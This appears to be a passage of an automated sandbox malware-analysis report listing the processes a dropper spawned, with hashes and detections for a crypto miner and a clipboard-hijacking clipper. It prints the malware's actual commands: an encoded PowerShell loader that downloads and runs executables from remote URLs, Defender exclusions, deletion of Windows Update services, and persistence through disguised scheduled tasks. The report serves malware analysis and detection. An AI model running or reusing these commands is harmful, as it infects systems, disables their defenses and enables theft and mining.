                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB1AGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQA8ACMAdABhAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAbgBqAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAbQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAFMAZQBuAGQALgBlAHgAZQAnACkAPAAjAGQAbgBnACMAPgA="
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:13:13:12
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:13:13:14
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:13:13:14
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:13:13:22
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\LicCheck.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\LicCheck.exe"
                                                                                                  Imagebase:0x790000
                                                                                                  File size:293'888 bytes
                                                                                                  MD5 hash:726A5B76F4C40551741FFDDA14088CE3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:13:13:22
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\LicSend.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\LicSend.exe"
                                                                                                  Imagebase:0x7ff7d3b90000
                                                                                                  File size:2'330'112 bytes
                                                                                                  MD5 hash:4648D5EF582C7B17D9712F5B5B60F046
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:13:13:28
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:13:13:28
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                  Imagebase:0x7ff6a9b50000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                  Imagebase:0x7ff6a9b50000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:19
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:sc stop UsoSvc
                                                                                                  Imagebase:0x7ff7c55d0000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:20
                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                  Imagebase:0x7ff7e34d0000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:21
                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                  Imagebase:0x7ff7e34d0000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:22
                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:sc stop WaaSMedicSvc
                                                                                                  Imagebase:0x7ff7c55d0000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:23
                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                  Imagebase:0x7ff7e34d0000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:24
                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:sc stop wuauserv
                                                                                                  Imagebase:0x7ff7c55d0000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:25
                                                                                                  Start time:13:13:35
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                  Imagebase:0x7ff7e34d0000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:26
                                                                                                  Start time:13:13:35
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:sc stop bits
                                                                                                  Imagebase:0x7ff7c55d0000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:27
                                                                                                  Start time:13:13:35
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:sc stop dosvc
                                                                                                  Imagebase:0x7ff7c55d0000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:28
                                                                                                  Start time:13:13:36
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:29
                                                                                                  Start time:13:13:37
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:30
                                                                                                  Start time:13:13:37
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:31
                                                                                                  Start time:13:13:37
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:32
                                                                                                  Start time:13:13:38
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                  Imagebase:0x7ff620de0000
                                                                                                  File size:77'312 bytes
                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:33
                                                                                                  Start time:13:13:51
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                                  Imagebase:0x10000
                                                                                                  File size:187'904 bytes
                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:34
                                                                                                  Start time:13:13:51
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:35
                                                                                                  Start time:13:13:55
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  Imagebase:0xbe0000
                                                                                                  File size:831'814'656 bytes
                                                                                                  MD5 hash:60EF19D1B9B74D6AAD6007EBBF88CDF3
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:37
                                                                                                  Start time:13:13:58
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\System32\dialer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\dialer.exe
                                                                                                  Imagebase:0x7ff7e3080000
                                                                                                  File size:39'936 bytes
                                                                                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_SilentCryptoMiner, Description: Yara detected SilentCrypto Miner, Source: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:38
                                                                                                  Start time:13:13:59
                                                                                                  Start date:04/10/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
